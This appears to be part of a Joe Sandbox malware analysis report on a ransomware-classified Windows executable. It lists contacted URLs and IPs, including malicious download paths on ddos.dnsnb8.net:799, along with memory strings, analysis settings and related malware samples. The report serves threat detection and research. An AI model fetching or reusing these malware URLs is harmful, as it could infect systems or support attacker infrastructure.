https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/mapcontrol/logging.ashx	0%	Avira URL Cloud	safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.	0%	Avira URL Cloud	safe
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarE	100%	Avira URL Cloud	phishing
https://dynamic.t	0%	Avira URL Cloud	safe
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/REST/v1/Routes/Transit	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rarcC:	100%	Avira URL Cloud	malware
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=	0%	Avira URL Cloud	safe
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar5	100%	Avira URL Cloud	phishing
https://dev.ditu.live.com/REST/v1/Locations	0%	Avira URL Cloud	safe
https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespace	0%	Avira URL Cloud	safe
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip	0%	Avira URL Cloud	safe
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	0%	Avira URL Cloud	safe
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar-	wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000004.00000002.1431816718.000002DC08268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413170981.000002DC08267000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://html.spec.whatwg.org/#strip-and-collapse-whitespace	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promisesaplus.com/#point-75	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugs.webkit.org/show_bug.cgi?id=29084	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.w3.	svchost.exe, 00000026.00000002.3709091663.00000168A0332000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/jquery/jquery/pull/557)	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000004.00000002.1430992301.000002DC08242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugs.chromium.org/p/chromium/issues/detail?id=378607	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/search?q=how	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugs.chromium.org/p/chromium/issues/detail?id=470258	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promisesaplus.com/#point-64	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 00000004.00000002.1430182760.000002DC08213000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1416923421.000002DC0825A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000004.00000002.1431816718.000002DC08268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413170981.000002DC08267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://promisesaplus.com/#point-61	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipP	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719819751.000000001000C000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://drafts.csswg.org/cssom/#resolved-values	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugs.chromium.org/p/chromium/issues/detail?id=589347	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=649285	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 00000004.00000003.1410666875.000002DC08275000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1432110894.000002DC08277000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000004.00000002.1431816718.000002DC08268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413170981.000002DC08267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000004.00000003.1417088659.000002DC08249000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	wBQInv.exe, 00000002.00000003.1257865336.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607487222.0000000000413000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=	svchost.exe, 00000004.00000002.1430992301.000002DC08242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1414215402.000002DC0825D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://html.spec.whatwg.org/multipage/syntax.html#attributes-2	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar_	wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://promisesaplus.com/#point-59	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://jsperf.com/getall-vs-sizzle/2	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://promisesaplus.com/#point-57	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/eslint/eslint/issues/3229	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000004.00000002.1430458930.000002DC08237000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1417088659.000002DC08249000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micr	m_danish.wnry.0.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://promisesaplus.com/#point-54	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.	svchost.exe, 00000004.00000003.1417088659.000002DC08249000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarE	wBQInv.exe, 00000002.00000003.1276194123.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://developer.mozilla.org/en-US/docs/CSS/display	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.t	svchost.exe, 00000004.00000003.1413734420.000002DC08261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugs.webkit.org/show_bug.cgi?id=137337	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://promisesaplus.com/#point-48	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarcC:	wBQInv.exe, 00000002.00000002.1607845694.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespace	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar5	wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=491668	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719819751.000000001000C000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://bugs.chromium.org/p/chromium/issues/detail?id=449857	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000004.00000002.1431925217.000002DC08270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1411800337.000002DC0826E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000004.00000003.1417921521.000002DC08231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482655
Start date and time:	2024-07-26 01:49:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.evad.winEXE@808/840@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 90 Number of non-executed functions: 66
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Simulations

Behavior and APIs

Time	Type	Description
19:50:26	API Interceptor	2x Sleep call for process: dllhost.exe modified
19:50:30	API Interceptor	4531364x Sleep call for process: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe modified
21:26:44	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Endermanch@Antivirus.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	Endermanch@7ev3n.exe	Get hash	malicious	7ev3n, Bdaejec, UACMe	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Endermanch@Antivirus.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Endermanch@Antivirus2010.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Endermanch@CleanThis.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Endermanch@Birele.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Endermanch@MEMZ.exe	Get hash	malicious	Bdaejec, KillMBR	Browse	ddos.dnsnb8.net:799/cj//k2.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@Antivirus.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	Endermanch@7ev3n.exe	Get hash	malicious	7ev3n, Bdaejec, UACMe	Browse	44.221.84.105
	Endermanch@Antivirus.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@Antivirus2010.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@CleanThis.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@Birele.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@MEMZ.exe	Get hash	malicious	Bdaejec, KillMBR	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@Antivirus.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	Endermanch@7ev3n.exe	Get hash	malicious	7ev3n, Bdaejec, UACMe	Browse	44.221.84.105
	Endermanch@Antivirus.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@Antivirus2010.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@CleanThis.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@Birele.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@LPS2019.exe	Get hash	malicious	Unknown	Browse	34.236.35.187

JA3 Fingerprints

⊘No context

Dropped Files

